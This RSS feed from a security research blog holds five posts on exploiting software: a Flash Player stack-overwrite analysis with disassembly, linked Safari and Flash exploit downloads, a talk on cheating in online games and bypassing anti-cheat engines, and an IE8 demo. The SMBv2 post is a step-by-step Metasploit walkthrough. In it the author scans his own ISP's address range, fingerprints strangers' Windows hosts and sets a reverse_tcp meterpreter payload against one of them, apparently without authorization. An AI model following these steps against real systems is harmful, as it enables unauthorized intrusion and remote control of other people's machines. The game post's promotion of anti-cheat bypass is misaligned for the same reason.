<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Abysssec Security Research &#187; Uncategorized</title>
	<atom:link href="http://www.abysssec.com/blog/category/uncategorized/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.abysssec.com/blog</link>
	<description>Security Researches , Advisories , Coding , Projects , Reversing , Exploitation , Fuzzing</description>
	<lastBuildDate>Tue, 31 Jan 2012 15:52:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Exploiting CVE-2011-2140 another flash player vulnerability</title>
		<link>http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/</link>
		<comments>http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/#comments</comments>
		<pubDate>Tue, 31 Jan 2012 15:41:43 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=1469</guid>
		<description><![CDATA[hello all . before going future we are sorry to not update blog regularly, but it&#8217;s due to we are busy with stack of projects and also working on our expert training courses. so as we didn&#8217;t post any blog post here we go with another flash player exploit we wrote long time ago. &#160; 1) Advisory information [...]]]></description>
			<content:encoded><![CDATA[<p>hello all .</p>
<p>before going future we are sorry to not update blog regularly, but it&#8217;s due to we are busy with stack of projects and also working on our <strong><span style="text-decoration: underline;">expert training courses.</span></strong></p>
<p>so as we didn&#8217;t post any blog post here we go with another flash player exploit we wrote long time ago.</p>
<p>&nbsp;</p>
<h1>1) Advisory information</h1>
<p>&nbsp;</p>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" width="638"><strong>  Title                   :  </strong><strong>Adobe flash player memory overwrite exploit </strong><strong></strong><strong>  Version             :  </strong><strong>&lt;= 10.3.186.3</strong><strong></strong><strong>  Discovery         :  <a href="http://www.zerodayinitiative.com/advisories/ZDI-11-276/">http://www.zerodayinitiative.com/advisories/ZDI-11-276/</a></strong><strong>  Vendor             :  <a href="http://adobe.com/">http://adobe.com</a></strong></p>
<p><strong>  Impact              :  Critical</strong></p>
<p><strong>  Contact            :   info  [at] abysssec.com</strong></p>
<p><strong>  Twitter             :   @abysssec</strong></p>
<p><strong> </strong></td>
</tr>
</tbody>
</table>
<h1>2) Vulnerability Information</h1>
<p>&nbsp;</p>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" width="638">Class<strong>        1- Stack Overwrite</strong>Impact<strong></strong><strong>Successfully exploiting this issue allows remote attackers to gain code execution on vulnerable system</strong></p>
<p>Remotely Exploitable</p>
<p><strong>Yes</strong></p>
<p>Locally Exploitable<strong></strong></p>
<p><strong>Yes</strong></td>
</tr>
</tbody>
</table>
<h1></h1>
<p>&nbsp;</p>
<p>&nbsp;</p>
<h1>3) Vulnerabilities detail</h1>
<p>&nbsp;</p>
<h2>1- Stack overwrite vulnerability</h2>
<p>&nbsp;</p>
<p>Before we go deep into the vulnerability for understanding this vulnerability you should take a look at MP4 format and H.264/AVC data structures.The actual vulnerability occurs during processing data units in Sequence Parameter Set in MP4. Sub_1005B396 function, is responsible for processing   Sequence Parameter Set. In this function pic_order_cnt_type from SPS will be check, if it’s equal with 1, other fields like data_pic_order_always_zero_flag , offset_for_non_ref_pic , offset_for_top_to_bottom_field  will be initialize :</p>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" width="638">.text:1005B396 sub_1005B396    proc near               ; CODE XREF: sub_1005B8DB+4Bp.text:1005B397                 push    ebp.text:1005B398                 push    esi.text:1005B399                 push    edi</p>
<p>.text:1005B39A                 mov     edi, ecx</p>
<p>.text:1005B39C                 call    sub_1005A95B</p>
<p>.text:1005B3A1                 mov     esi, [esp+10h+arg_0]</p>
<p>.text:1005B3A5                 mov     ecx, edi</p>
<p>.text:1005B3A7                 mov     [esi], al</p>
<p>&nbsp;</p>
<p>&#8230;</p>
<p>&nbsp;</p>
<p>.text:1005B47D                 mov     ecx, edi</p>
<p>.text:1005B47F                 mov     [esi+20h], eax</p>
<p>.text:1005B482                 call    sub_1005AA64</p>
<p>.text:1005B487                 mov     [esi+40h], eax</p>
<p>.text:1005B48A                 cmp     eax, ebp             <strong>à</strong>     <strong>if( pic_order_cnt_type )</strong></p>
<p>.text:1005B48C                 jnz     short loc_1005B49D</p>
<p>&nbsp;</p>
<p>…</p>
<p>&nbsp;</p>
<p>.text:1005B49D loc_1005B49D:                           ; CODE XREF: sub_1005B396+F6j</p>
<p>.text:1005B49D                 xor     ebx, ebx</p>
<p>.text:1005B49F                 inc     ebx</p>
<p>.text:1005B4A0                 cmp     eax, ebx            <strong>à</strong>       <strong>if( pic_order_cnt_type == 1 )</strong></p>
<p>.text:1005B4A2                 jnz     short loc_1005B4EF</p>
<p>.text:1005B4A4                 mov     ecx, edi</p>
<p>.text:1005B4A6                 call    sub_1005A99A    à       offset_for_top_to_bottom_field</p>
<p>.text:1005B4AB                 mov     ecx, edi</p>
<p>.text:1005B4AD                 mov     [esi+48h], al</p>
<p>.text:1005B4B0                 call    sub_1005AA93    à        offset_for_non_ref_pic</p>
<p>.text:1005B4B5                 mov     ecx, edi</p>
<p>.text:1005B4B7                 mov     [esi+54h], eax</p>
<p>.text:1005B4BA                 call    sub_1005AA93    à         offset_for_top_to_bottom_field<strong></strong></td>
</tr>
</tbody>
</table>
<p>&nbsp;</p>
<p>Then the num_ref_frames_in_pic_order_cnt_cycle will be set and if it’s bigger than 0 the values in offset_for_ref_frame will be copied into buffer.</p>
<table border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td valign="top" width="638">text:1005B4BF                 mov     ecx, edi.text:1005B4C1                 mov     [esi+50h], eax.text:1005B4C4                call    sub_1005AA64      <strong>à</strong>    <strong>num_ref_frames_in_pic_order_cnt_cycle</strong>.text:1005B4C9                 mov     [esi+4Ch], eax</p>
<p>.text:1005B4CC                 test    eax, eax</p>
<p>.text:1005B4CE                 jbe     short loc_1005B4EF</p>
<p>.text:1005B4D0                 lea     eax, [esi+58h]</p>
<p>.text:1005B4D3                 mov     [esp+10h+arg_0], eax</p>
<p>.text:1005B4D7</p>
<p>.text:1005B4D7 loc_1005B4D7:                                             <strong>à</strong>         <strong>do{</strong></p>
<p>.text:1005B4D7                 mov     ecx, edi</p>
<p>.text:1005B4D9                 call    sub_1005AA93                    <strong>à</strong>         <strong>offset_for_ref_frame[i]</strong></p>
<p>.text:1005B4DE                 mov     ecx, [esp+10h+arg_0]</p>
<p>.text:1005B4E2                 add     [esp+10h+arg_0], 4            <strong>à</strong><strong>          buf = &amp;buf + 4</strong></p>
<p>.text:1005B4E7                 inc     ebp                                      <strong>à</strong>          <strong>i++</strong></p>
<p>.text:1005B4E8                 mov     [ecx], eax                           <strong>à</strong>          <strong>buf = offset_for_ref_frame[i]</strong></p>
<p>.text:1005B4EA                 cmp     ebp, [esi+4Ch]</p>
<p>.text:1005B4ED                 jb      short loc_1005B4D7             <strong>à</strong>          <strong>} while(i &lt; </strong><strong>num_ref_frames_&#8230;</strong><strong>)    </strong></td>
</tr>
</tbody>
</table>
<p>You should got the vulnerability at this point. There is no boundary check for num_ref_frames_in_pic_order_cnt_cycle, so our data related to  offset_for_ref_frame will be copy into the stack , that’s all .</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<h2>2- Exploitation</h2>
<p>Thanks to windows memory manager, browser and class of bug it’s not that hard to archive RCE. The only thing that should care about is return address. Because values which copied from MP4 file into stack, come with the changes. In other words, these values ​​after reading from file will be decode and then are copied into stack. Values ​​are copied into the buffer are generated from values in file into Signed Exp-Golomb code.After taking controll of EIP it&#8217;s easy to finish the job we used basic heap spray.</p>
<p>here is reliable exploit : <a href="http://www.abysssec.com/blog/wp-content/uploads/2012/01/CVE-2011-2140.zip">CVE-2011-2140</a></p>
<p>happy hunting !</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Exploit for CVE-2011-0222  Safari SVG Vulnerability</title>
		<link>http://www.abysssec.com/blog/2011/07/26/exploit-for-cve-2011-0222-safari-svg-vulnerability/</link>
		<comments>http://www.abysssec.com/blog/2011/07/26/exploit-for-cve-2011-0222-safari-svg-vulnerability/#comments</comments>
		<pubDate>Tue, 26 Jul 2011 12:21:35 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=1359</guid>
		<description><![CDATA[Hello all again we are here with a patched vuln again and this time apple safari one . &#160; &#160; actually it&#8217;s not that really odd to see your 0day got patched in vendor big patches and this time this happened to US too. our safari vulnerability got patched and we decide to public our windows exploit + stand alone [...]]]></description>
			<content:encoded><![CDATA[<p>Hello all again</p>
<p>we are here with a patched vuln again and this time apple safari one .</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img class="aligncenter" title="Apple Bug" src="http://www.testingthefuture.net/wp-content/uploads/2011/01/Apple_bug.jpg" alt="" width="500" height="333" /></p>
<p>&nbsp;</p>
<p>actually it&#8217;s not that really odd to see your 0day got patched in vendor big patches and this time this happened to US too.</p>
<p>our safari vulnerability got patched and we decide to public our windows exploit + stand alone trigger without any pop up and finally a simple ROP to DEP bypass .</p>
<p>no more explanation this time check out exploit code.</p>
<pre>http://www.abysssec.com/files/CVE-2011-0222_WinXP_Exploit.zip

http://www.exploit-db.com/sploits/CVE-2011-0222_WinXP_Exploit.zip</pre>
<p>as always feel free to contact us : info [at] abysssec.com</p>
<p>follow @twitter for updates</p>
<p>&nbsp;</p>
<p>cheers</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2011/07/26/exploit-for-cve-2011-0222-safari-svg-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacking / Exploiting / Cheating in Online Games</title>
		<link>http://www.abysssec.com/blog/2011/03/21/hacking-exploiting-cheating-in-online-games/</link>
		<comments>http://www.abysssec.com/blog/2011/03/21/hacking-exploiting-cheating-in-online-games/#comments</comments>
		<pubDate>Mon, 21 Mar 2011 15:00:39 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[advisory]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[reversing]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aimbot]]></category>
		<category><![CDATA[Aimbot.dll]]></category>
		<category><![CDATA[bypass]]></category>
		<category><![CDATA[cheat]]></category>
		<category><![CDATA[counter strike]]></category>
		<category><![CDATA[cs 1.6]]></category>
		<category><![CDATA[flashhack]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[half-life]]></category>
		<category><![CDATA[hook]]></category>
		<category><![CDATA[noflash]]></category>
		<category><![CDATA[nosmoke]]></category>
		<category><![CDATA[ring0]]></category>
		<category><![CDATA[shahin]]></category>
		<category><![CDATA[smokehack]]></category>
		<category><![CDATA[speedhack]]></category>
		<category><![CDATA[SXE 11.6]]></category>
		<category><![CDATA[SXE 11.6 Fix 2]]></category>
		<category><![CDATA[SXE-Injected]]></category>
		<category><![CDATA[unhook]]></category>
		<category><![CDATA[VAC]]></category>
		<category><![CDATA[VAC 2]]></category>
		<category><![CDATA[Valve Anti Cheat]]></category>
		<category><![CDATA[wallhack]]></category>
		<category><![CDATA[world of warcraft]]></category>
		<category><![CDATA[wow]]></category>
		<category><![CDATA[WPE]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=1263</guid>
		<description><![CDATA[Hello to all readers. we know that there are thousands and millions of online game players around and we guess lots of them may like to cheat this is our totally offensive research that we did to present in immunity infiltrate and as we missed that so here we go . &#160; This research is about hacking [...]]]></description>
			<content:encoded><![CDATA[<p>Hello to all readers.</p>
<p>we know that there are thousands and millions of online game players around and we guess lots of them may like to cheat this is our totally offensive research that we did to present in <a href="https://www.immunityinc.com/infiltrate/" target="_blank"> <span style="color: #ff0000;"><strong>immunity infiltrate</strong></span></a> and as we missed that so here we go .</p>
<p>&nbsp;</p>
<p><a href="http://www.abysssec.com/blog/wp-content/uploads/2011/03/3-21-2011-6-01-12-PM1.png"><img class="aligncenter" title="3-21-2011 6-01-12 PM" src="http://www.abysssec.com/blog/wp-content/uploads/2011/03/3-21-2011-6-01-12-PM1-300x148.png" alt="" width="300" height="148" /></a></p>
<p>This research is about hacking /exploiting / cheating in online games and is sponsored by <span style="color: #ff0000;"><strong><a href="https://www.immunityinc.com/" target="_blank">immunity</a></strong></span>.</p>
<p>&nbsp;</p>
<p>This is a six part talk and contains:</p>
<p>&nbsp;</p>
<p>Part I   : introduction</p>
<p>Part II: Hacking Online Game Servers</p>
<p>Part III: Exploiting Online Games</p>
<p>Part IV: Cheating in Online games</p>
<p>Part V   : Creating your own cheats</p>
<p>Part VI: Bypassing anti-cheat engines</p>
<p>&nbsp;</p>
<p>Real world cheating is mainly focused on in this talk as it&#8217;s fun and legal.<br />
During this talk we will have a tour into all the ways to manipulate an online game<br />
and we will end up with bypassing the latest anti-cheating technologies and<br />
manipulating the game to our heart&#8217;s desire.</p>
<p>&nbsp;</p>
<p>Our case studies are:</p>
<p>&nbsp;</p>
<p>1 -counter strike (half-life) as game:</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img class="aligncenter" title="Cstrike" src="http://www.straferight.com/photopost/data/500/counter-strike-logo.jpg" alt="" width="240" height="241" /></p>
<p>2- SXE-Injected and Valve-anti cheat (VAC) as anti-cheat engines</p>
<p style="text-align: center;"><img class="aligncenter" title="SXE-Injected" src="http://www.asosyalgenclik.net/sxe.png" alt="" width="240" height="240" /></p>
<p>Our codes will be release soon as soon we can but if you are hurry to use some cheats you can find almost all necessary codes in slides also there is two demos for proofing our research. We really enjoyed this research and it’s done from our side hope you enjoy too.</p>
<p>&nbsp;</p>
<p>You can download slides here:</p>
<p>ppt : <a href="http://www.abysssec.com/blog/wp-content/uploads/2011/03/Exploiting-Online-Games.pptx" target="_blank">Exploiting-Online-Games</a></p>
<p>Font : <a href="http://www.abysssec.com/blog/wp-content/uploads/2011/03/Purisa.zip" target="_blank">in case if you have problem with embedded one </a></p>
<p>PDF : <a href="http://www.abysssec.com/blog/wp-content/uploads/2011/03/Exploiting-Online-Games.pdf" target="_blank">Exploiting-Online-Games</a></p>
<p>PS 1 : video demos are ready but due to those are huge we need to find a better way to compress them after that we will post them here.</p>
<p>PS 2 : Tools will be release after a while .</p>
<p>For getting updates about tools / videos please follow @abysssec in twitter.</p>
<p>&nbsp;</p>
<p>For any question please contact:</p>
<p>&nbsp;</p>
<p>Shahin [at] abysssec.com</p>
<p>&nbsp;</p>
<p>For any other requirement please contact:</p>
<p>&nbsp;</p>
<p>Info [at] abysssec.com</p>
<p>&nbsp;</p>
<p>Kind Regards</p>
<p style="text-align: left;">&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2011/03/21/hacking-exploiting-cheating-in-online-games/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Exploiting Internet Explorer 8 on Windows 7</title>
		<link>http://www.abysssec.com/blog/2010/12/21/exploiting-internet-explorer-8-on-windows-7/</link>
		<comments>http://www.abysssec.com/blog/2010/12/21/exploiting-internet-explorer-8-on-windows-7/#comments</comments>
		<pubDate>Mon, 20 Dec 2010 23:03:40 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=1257</guid>
		<description><![CDATA[hello all. Our Demo is clear enough. maybe we release some more detail&#8217;s later. [There is a video that cannot be displayed in this feed. Visit the blog entry to see the video.] good luck]]></description>
			<content:encoded><![CDATA[<p>hello all.</p>
<div id="_mcePaste">Our Demo is clear enough. maybe we release some more detail&#8217;s later.</div>
<p>[There is a video that cannot be displayed in this feed. <a href="http://www.abysssec.com/blog/2010/12/21/exploiting-internet-explorer-8-on-windows-7/">Visit the blog entry to see the video.]</a></p>
<p>good luck</p>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2010/12/21/exploiting-internet-explorer-8-on-windows-7/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Exploiting Vista / 2008 Using SMBV2 Exploit</title>
		<link>http://www.abysssec.com/blog/2009/10/02/exploiting-vista-2008-using-smbv2-exploit/</link>
		<comments>http://www.abysssec.com/blog/2009/10/02/exploiting-vista-2008-using-smbv2-exploit/#comments</comments>
		<pubDate>Fri, 02 Oct 2009 15:37:10 +0000</pubDate>
		<dc:creator>shahin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.abysssec.com/blog/?p=404</guid>
		<description><![CDATA[hello all in a few recent days i worked on smbv2 ProcessID Function Table Dereference vulnerability and after lots of work actually i got my shell after kostya and rest of Immunity. but there is a good news for you Stephen Fewer finally released his exploit for metasploit too. a note : stephen exploit is [...]]]></description>
			<content:encoded><![CDATA[<p>hello all</p>
<p>in a few recent days i worked on smbv2 ProcessID Function Table Dereference vulnerability and after lots of work actually i got my shell after kostya and rest of Immunity. but there is a good news for you <a href="http://harmonysecurity.com/">Stephen Fewer</a> finally released his exploit for metasploit too.</p>
<p>a note : stephen exploit is no so reliable refer to selecting address in HAL  but it&#8217;s free &#8230;</p>
<p>metasploit 3.3 DEV have this module by default .</p>
<p>and here are steps for exploitation using metasploit</p>
<p>step 0:</p>
<p>run msfconsole.bat</p>
<p>step 1 :</p>
<p>scanning for targets<br />
msf &gt; use auxiliary/scanner/smb/smb2<br />
msf auxiliary(smb2) &gt; set RHOSTS xx.xx.xx.x-xx.xx.xx.254<br />
RHOSTS =&gt;xx.xx.xx.x-xx.xx.xx.254<br />
msf auxiliary(smb2) &gt; set THREADS 50<br />
THREADS =&gt; 50<br />
msf auxiliary(smb2) &gt; run</p>
<p>for example i found on my ADSL range  :</p>
<p>[*] xx.xx.xx.x supports SMB 2 [dialect 255.2] and has been online for 285 hours</p>
<p>step 2 :</p>
<p>now you need check version of founded target (i think it&#8217;s better to know before send your exploit)</p>
<p>msf auxiliary(smb2) &gt; use auxiliary/scanner/smb/version<br />
msf auxiliary(version) &gt; set RHOSTS xx.xx.xx.x<br />
RHOSTS =&gt; xx.xx.xx.x<br />
msf auxiliary(version) &gt; run</p>
<p>[*] xx.xx.xx.x is running Windows 7 Ultimate (Build 7100) (language: Unknown)<br />
[*] Auxiliary module execution completed<br />
msf auxiliary(version) &gt; set RHOSTS xx.xx.xx.x<br />
RHOSTS =&gt; xx.xx.xx.x<br />
msf auxiliary(version) &gt; run</p>
<p>[*] xx.xx.xx.x  is running Windows 7 Ultimate (Build 7229) (language: Unknown)<br />
[*] Auxiliary module execution completed<br />
msf auxiliary(version) &gt; set RHOSTS xx.xx.xx.x<br />
RHOSTS =&gt; xx.xx.xx.x<br />
msf auxiliary(version) &gt; run</p>
<p>[*] xx.xx.xx.x is running Windows Vista Home Basic Service Pack 2 (language: Unknown)<br />
[*] Auxiliary module execution completed</p>
<p>as you may noticed i just found one windows vista and two others are windows 7 .this exploit will work against vista sp1-2 and windows 2008 (not rc2)</p>
<p>step 3 :</p>
<p>now you can set and send exploit</p>
<p>msf auxiliary(version) &gt; use exploit/windows/smb/smb2_negotiate_func_index<br />
msf exploit(smb2_negotiate_func_index) &gt; set PAYLOAD windows/meterpreter/reverse_tcp<br />
PAYLOAD =&gt; windows/meterpreter/reverse_tcp<br />
set msf exploit(smb2_negotiate_func_index) &gt; set LPORT 5678<br />
LPORT =&gt; 5678<br />
msf exploit(smb2_negotiate_func_index) &gt; set LHOST xx.xx.xx.x<br />
LHOST =&gt; xx.xx.xx.x<br />
msf exploit(smb2_negotiate_func_index) &gt; set RHOST xx.xx.xx.x<br />
RHOST =&gt; xx.xx.xx.x<br />
msf exploit(smb2_negotiate_func_index) &gt; exploit</p>
<p>and here is output of metasploit exploit on my target :</p>
<p style="text-align: center;"><img class="aligncenter" title="SMBv2 Exploit" src="http://i35.tinypic.com/2mw6nvo.png" alt="" width="557" height="234" /></p>
<p>note : i will try to have a technical detail post  for exploitation and also my version of exploit for you soon.</p>
<p>happy hunting</p>
<p>shahin</p>
<div id="_mcePaste" style="overflow: hidden; position: absolute; left: -10000px; top: 1200px; width: 1px; height: 1px;">xx.xx.xx.x</div>
]]></content:encoded>
			<wfw:commentRss>http://www.abysssec.com/blog/2009/10/02/exploiting-vista-2008-using-smbv2-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

